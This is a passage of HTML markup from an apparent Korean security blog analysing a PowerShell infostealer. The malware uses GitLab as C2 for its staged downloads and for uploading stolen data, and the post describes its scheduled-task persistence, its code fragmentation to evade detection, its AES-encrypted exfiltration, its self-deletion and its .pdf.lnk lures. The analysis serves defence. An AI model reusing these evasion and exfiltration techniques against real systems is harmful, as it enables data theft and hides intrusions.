&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;GitLab &lt;/span&gt;&lt;span&gt;저장소에서&lt;/span&gt; &lt;span&gt;암호화된&lt;/span&gt; &lt;span&gt;형태로&lt;/span&gt; &lt;span&gt;저장된&lt;/span&gt;&lt;span&gt; ajobcall.txt &lt;/span&gt;&lt;span&gt;파일을&lt;/span&gt; &lt;span&gt;내려받아&lt;/span&gt; &lt;span&gt;복호화한&lt;/span&gt; &lt;span&gt;뒤&lt;/span&gt;&lt;span&gt;, news.ps1&lt;/span&gt;&lt;span&gt;이라는&lt;/span&gt; &lt;span&gt;이름으로&lt;/span&gt; &lt;span&gt;저장하고&lt;/span&gt; &lt;span&gt;즉시&lt;/span&gt; &lt;span&gt;실행합니다&lt;/span&gt;&lt;span&gt;. &lt;/span&gt;&lt;span&gt;실행이&lt;/span&gt; &lt;span&gt;완료되면&lt;/span&gt; &lt;span&gt;스크립트&lt;/span&gt; &lt;span&gt;자신을&lt;/span&gt; &lt;span&gt;삭제하여&lt;/span&gt; &lt;span&gt;흔적을&lt;/span&gt; &lt;span&gt;지웁니다&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;3. 2&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span&gt;차&lt;/span&gt; &lt;/b&gt;&lt;b&gt;&lt;span&gt;다운로더&lt;/span&gt; &lt;span&gt;(facebook.ps1) - 35&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span&gt;분마다&lt;/span&gt; &lt;/b&gt;&lt;b&gt;&lt;span&gt;반복되는&lt;/span&gt; &lt;/b&gt;&lt;b&gt;&lt;span&gt;정보탈취&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;facebook.ps1&lt;/span&gt;&lt;span&gt;은&lt;/span&gt;&lt;span&gt; 2&lt;/span&gt;&lt;span&gt;단계에서&lt;/span&gt; &lt;span&gt;등록된&lt;/span&gt; &lt;span&gt;예약&lt;/span&gt; &lt;span&gt;작업에&lt;/span&gt; &lt;span&gt;의해&lt;/span&gt;&lt;span&gt; 35&lt;/span&gt;&lt;span&gt;분&lt;/span&gt; &lt;span&gt;주기로&lt;/span&gt; &lt;span&gt;반복&lt;/span&gt; &lt;span&gt;실행되는&lt;/span&gt;&lt;span&gt; 2&lt;/span&gt;&lt;span&gt;차&lt;/span&gt; &lt;span&gt;다운로더로써&lt;/span&gt; &lt;span&gt;GitLab &lt;/span&gt;&lt;span&gt;저장소에서&lt;/span&gt; &lt;span&gt;암호화된&lt;/span&gt;&lt;span&gt; scall.txt &lt;/span&gt;&lt;span&gt;파일을&lt;/span&gt; &lt;span&gt;다운받아&lt;/span&gt; &lt;span&gt;복호화한&lt;/span&gt; &lt;span&gt;뒤&lt;/span&gt;&lt;span&gt; news.ps1&lt;/span&gt;&lt;span&gt;로&lt;/span&gt; &lt;span&gt;저장하고&lt;/span&gt; &lt;span&gt;실행합니다&lt;/span&gt;&lt;span&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1317&quot; data-origin-height=&quot;616&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/mCf06/dJMcacWUEyo/xPPmFkGGyGIOIIKiSFbyd0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/mCf06/dJMcacWUEyo/xPPmFkGGyGIOIIKiSFbyd0/img.png&quot; data-alt=&quot;[그림 7] news.ps1 생성 코드&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/mCf06/dJMcacWUEyo/xPPmFkGGyGIOIIKiSFbyd0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FmCf06%2FdJMcacWUEyo%2FxPPmFkGGyGIOIIKiSFbyd0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1317&quot; height=&quot;616&quot; data-origin-width=&quot;1317&quot; data-origin-height=&quot;616&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 7] news.ps1 생성 코드&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;보안&lt;/span&gt; &lt;span&gt;솔루션의&lt;/span&gt; &lt;span&gt;탐지를&lt;/span&gt; &lt;span&gt;우회하기&lt;/span&gt; &lt;span&gt;위해&lt;/span&gt; &lt;span&gt;스크립트&lt;/span&gt; &lt;span&gt;내부&lt;/span&gt; &lt;span&gt;코드&lt;/span&gt; &lt;span&gt;일부를&lt;/span&gt; &lt;span&gt;분리된&lt;/span&gt; &lt;span&gt;조각으로&lt;/span&gt; &lt;span&gt;나눠&lt;/span&gt; &lt;span&gt;저장하고&lt;/span&gt; &lt;span&gt;실행&lt;/span&gt; &lt;span&gt;시점에&lt;/span&gt; &lt;span&gt;조립하는&lt;/span&gt; &lt;span&gt;방식을&lt;/span&gt; &lt;span&gt;사용합니다&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;이를&lt;/span&gt; &lt;span&gt;통해&lt;/span&gt; &lt;span&gt;공격자는&lt;/span&gt;&lt;span&gt; GitLab &lt;/span&gt;&lt;span&gt;저장소의&lt;/span&gt;&lt;span&gt; scall.txt &lt;/span&gt;&lt;span&gt;파일만&lt;/span&gt; &lt;span&gt;교체하면&lt;/span&gt;&lt;span&gt;, &lt;/span&gt;&lt;span&gt;피해자&lt;/span&gt; &lt;span&gt;시스템에서&lt;/span&gt; &lt;span&gt;실행되는&lt;/span&gt; &lt;span&gt;악성코드를&lt;/span&gt; &lt;span&gt;언제든지&lt;/span&gt; &lt;span&gt;원격으로&lt;/span&gt; &lt;span&gt;업데이트할&lt;/span&gt; &lt;span&gt;수&lt;/span&gt; &lt;span&gt;있습니다&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;4. &lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span&gt;최종&lt;/span&gt; &lt;/b&gt;&lt;b&gt;&lt;span&gt;페이로드&lt;/span&gt;&lt;span&gt;(news.ps1) - &lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span&gt;정보탈취형&lt;/span&gt; &lt;/b&gt;&lt;b&gt;&lt;span&gt;악성코드&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;2&lt;/span&gt;&lt;span&gt;단계&lt;/span&gt;&lt;span&gt;(firefox.ps1)&lt;/span&gt;&lt;span&gt;와&lt;/span&gt;&lt;span&gt; 3&lt;/span&gt;&lt;span&gt;단계&lt;/span&gt;&lt;span&gt;(facebook.ps1) &lt;/span&gt;&lt;span&gt;파워셸&lt;/span&gt; &lt;span&gt;스크립트는&lt;/span&gt; &lt;span&gt;모두&lt;/span&gt; &lt;span&gt;최종적으로&lt;/span&gt; &lt;span&gt;동일한&lt;/span&gt; &lt;span&gt;정보탈취&lt;/span&gt; &lt;span&gt;악성코드인&lt;/span&gt;&lt;span&gt; news.ps1&lt;/span&gt;&lt;span&gt;을&lt;/span&gt; &lt;span&gt;실행합니다&lt;/span&gt;&lt;span&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;해당&lt;/span&gt; &lt;span&gt;파워셸&lt;/span&gt; &lt;span&gt;스크립트는&lt;/span&gt; &lt;span&gt;정보수집&lt;/span&gt;&lt;span&gt; &amp;rarr; &lt;/span&gt;&lt;span&gt;암호화&lt;/span&gt;&lt;span&gt; &amp;rarr; &lt;/span&gt;&lt;span&gt;유출&lt;/span&gt;&lt;span&gt; &amp;rarr; &lt;/span&gt;&lt;span&gt;흔적&lt;/span&gt; &lt;span&gt;삭제&lt;/span&gt; &lt;span&gt;순서로&lt;/span&gt; &lt;span&gt;동작하며&lt;/span&gt;&lt;span&gt;, &lt;/span&gt;&lt;span&gt;실행&lt;/span&gt; &lt;span&gt;후&lt;/span&gt; &lt;span&gt;어떠한&lt;/span&gt; &lt;span&gt;흔적도&lt;/span&gt; &lt;span&gt;남기지&lt;/span&gt; &lt;span&gt;않도록&lt;/span&gt; &lt;span&gt;설계되었습니다&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;4-1) &lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span&gt;감염&lt;/span&gt; &lt;/b&gt;&lt;b&gt;&lt;span&gt;시스템&lt;/span&gt; &lt;/b&gt;&lt;b&gt;&lt;span&gt;식별&lt;/span&gt; &lt;/b&gt;&lt;b&gt;&lt;span&gt;정보&lt;/span&gt; &lt;/b&gt;&lt;b&gt;&lt;span&gt;수집&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;Windows&lt;/span&gt;&lt;span&gt;에&lt;/span&gt; &lt;span&gt;내장된&lt;/span&gt; &lt;span&gt;시스템&lt;/span&gt; &lt;span&gt;관리&lt;/span&gt; &lt;span&gt;기능인&lt;/span&gt;&lt;span&gt; WMI(Windows Management Instrumentation)&lt;/span&gt;&lt;span&gt;를&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span&gt;이용해&lt;/span&gt; &lt;span&gt;감염&lt;/span&gt; &lt;span&gt;시스템에서&lt;/span&gt; &lt;span&gt;다음과&lt;/span&gt; &lt;span&gt;같은&lt;/span&gt; &lt;span&gt;정보를&lt;/span&gt; &lt;span&gt;수집합니다&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;활성화된 로컬 IP 주소 수집&lt;/li&gt;
&lt;li&gt;시스템 마지막 부팅 시간 수집&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;수집된&lt;/span&gt; &lt;span&gt;정보는&lt;/span&gt; &lt;span&gt;다음과&lt;/span&gt; &lt;span&gt;같은&lt;/span&gt; &lt;span&gt;규칙으로&lt;/span&gt; &lt;span&gt;파일명이&lt;/span&gt; &lt;span&gt;생성되어&lt;/span&gt; &lt;span&gt;%AppData% &lt;/span&gt;&lt;span&gt;경로에&lt;/span&gt; &lt;span&gt;저장됩니다&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;규칙: &amp;lt;IP Address&amp;gt;-&amp;lt;MMdd_HHmm&amp;gt;-XXX-kkk.txt&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;962&quot; data-origin-height=&quot;131&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cv3tcx/dJMb99TqDiR/TDJuRwIhr6eTmyPr2nZ3MK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cv3tcx/dJMb99TqDiR/TDJuRwIhr6eTmyPr2nZ3MK/img.png&quot; data-alt=&quot;[그림 8] 수집된 정보 파일 저장 코드&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cv3tcx/dJMb99TqDiR/TDJuRwIhr6eTmyPr2nZ3MK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fcv3tcx%2FdJMb99TqDiR%2FTDJuRwIhr6eTmyPr2nZ3MK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;962&quot; height=&quot;131&quot; data-origin-width=&quot;962&quot; data-origin-height=&quot;131&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 8] 수집된 정보 파일 저장 코드&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;4-2) &lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span&gt;수집&lt;/span&gt; &lt;/b&gt;&lt;b&gt;&lt;span&gt;데이터&lt;/span&gt; &lt;/b&gt;&lt;b&gt;&lt;span&gt;암호화&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;수집된&lt;/span&gt; &lt;span&gt;정보는&lt;/span&gt; &lt;span&gt;외부로&lt;/span&gt; &lt;span&gt;전송하기&lt;/span&gt; &lt;span&gt;전에&lt;/span&gt;&lt;span&gt; AES-256 &lt;/span&gt;&lt;span&gt;방식으로&lt;/span&gt; &lt;span&gt;암호화합니다&lt;/span&gt;&lt;span&gt;. &lt;/span&gt;&lt;span&gt;수집된&lt;/span&gt; &lt;span&gt;데이터를&lt;/span&gt; &lt;span&gt;암호화하여&lt;/span&gt; &lt;span&gt;전송하기&lt;/span&gt; &lt;span&gt;때문에&lt;/span&gt;&lt;span&gt;, &lt;/span&gt;&lt;span&gt;네트워크&lt;/span&gt; &lt;span&gt;보안&lt;/span&gt; &lt;span&gt;장비가&lt;/span&gt; &lt;span&gt;트래픽&lt;/span&gt; &lt;span&gt;내용을&lt;/span&gt; &lt;span&gt;확인해도&lt;/span&gt; &lt;span&gt;악성&lt;/span&gt; &lt;span&gt;행위임을&lt;/span&gt; &lt;span&gt;판별하기&lt;/span&gt; &lt;span&gt;어렵습니다&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;4-3) GitLab API&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span&gt;를&lt;/span&gt; &lt;/b&gt;&lt;b&gt;&lt;span&gt;통한&lt;/span&gt; &lt;/b&gt;&lt;b&gt;&lt;span&gt;데이터&lt;/span&gt; &lt;/b&gt;&lt;b&gt;&lt;span&gt;유출&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;암호화된&lt;/span&gt; &lt;span&gt;파일을&lt;/span&gt; &lt;span style=&quot;color: #1f2328;&quot;&gt;Base64&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;로&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;인코딩한&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;뒤&lt;/span&gt; &lt;span&gt;공격자가&lt;/span&gt; &lt;span&gt;미리&lt;/span&gt; &lt;span&gt;설정해&lt;/span&gt; &lt;span&gt;둔&lt;/span&gt;&lt;span&gt; GitLab API &lt;/span&gt;&lt;span&gt;토큰을&lt;/span&gt; &lt;span&gt;이용해&lt;/span&gt; &lt;span&gt;공격자&lt;/span&gt; &lt;span&gt;저장소로&lt;/span&gt; &lt;span&gt;전송합니다&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;업로드 경로: report/&amp;lt;IP주소&amp;gt;-&amp;lt;날짜시간&amp;gt;-XXX-kkk.txt.enc&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;852&quot; data-origin-height=&quot;125&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/GqZZN/dJMcacJp12T/vkheFQXxNfVwfczPBYem5k/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/GqZZN/dJMcacJp12T/vkheFQXxNfVwfczPBYem5k/img.png&quot; data-alt=&quot;[그림 9] GitLab 저장소 업로드 경로&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/GqZZN/dJMcacJp12T/vkheFQXxNfVwfczPBYem5k/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FGqZZN%2FdJMcacJp12T%2FvkheFQXxNfVwfczPBYem5k%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;852&quot; height=&quot;125&quot; data-origin-width=&quot;852&quot; data-origin-height=&quot;125&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 9] GitLab 저장소 업로드 경로&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;4-4)&amp;nbsp;흔적&amp;nbsp;삭제&lt;/b&gt; &lt;br /&gt;전송이 완료되면 수집된 원본 파일, 암호화된 업로드 파일, 실행된 스크립트 자신까지 모두 강제 삭제합니다. 이는&amp;nbsp;감염&amp;nbsp;시스템에&amp;nbsp;남는&amp;nbsp;흔적을&amp;nbsp;최소화하여&amp;nbsp;사용자가&amp;nbsp;감염&amp;nbsp;사실을&amp;nbsp;인지하기&amp;nbsp;어렵게&amp;nbsp;만들고,&amp;nbsp;사후&amp;nbsp;추적을&amp;nbsp;방해하기&amp;nbsp;위한&amp;nbsp;목적으로&amp;nbsp;볼&amp;nbsp;수&amp;nbsp;있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h2 style=&quot;border-left: 8px solid #000000; padding: 12px 20px; background-color: #f8f9fa; color: #1a1a1a; font-weight: bold; font-size: 22px; margin: 30px 0 15px 0; border-bottom: 1px solid #e0e0e0; font-family: 'Pretendard', sans-serif; letter-spacing: -0.5px;&quot; data-ke-size=&quot;size26&quot;&gt;공격 특징&amp;nbsp;&lt;/h2&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;이번&lt;/span&gt; &lt;span&gt;공격에서&lt;/span&gt; &lt;span&gt;확인된&lt;/span&gt; &lt;span&gt;주요&lt;/span&gt; &lt;span&gt;공격&lt;/span&gt; &lt;span&gt;특징을&lt;/span&gt; &lt;span&gt;정리하면&lt;/span&gt; &lt;span&gt;다음과&lt;/span&gt; &lt;span&gt;같습니다&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;이중 확장자와 미끼 파일을 활용한 위장 공격&lt;/b&gt;&lt;br /&gt;.pdf.lnk&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;와&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;같은&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;이중&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;확장자&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;형태로&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;파일명을&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;구성하여&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;사용자가&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;정상적&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;문서&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;파일로&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;오인&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;하도록&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;유도했으며&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;, &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;미끼&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;파일을&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;활용해&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;감염&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;사실을&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;인지하기&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;어렵게&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;만듭니다&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;합법적&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;서비스&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;(GitLab) &lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;&lt;b&gt;악용&lt;/b&gt;&lt;br /&gt;&lt;/span&gt;별도의&lt;span style=&quot;color: #1f2328;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;악성&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;서버&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;없이&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; GitLab&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;을&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; C2&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;로&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;활용함으로써&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;네트워크&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;탐지&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;시스템을&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;효과적으로&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;우회합니다&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;. 443 &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;포트&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; HTTPS &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;트래픽이고&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;도메인&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;자체가&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;신뢰&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;대상이기&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;때문에&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;, &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;방화벽과&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; IPS &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;기반&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;차단이&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;어려우며&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;, C2 &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;저장소&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;삭제만으로&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;증거가&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;즉시&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;소멸될&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;수&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;있어&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; &lt;/span&gt;&lt;span 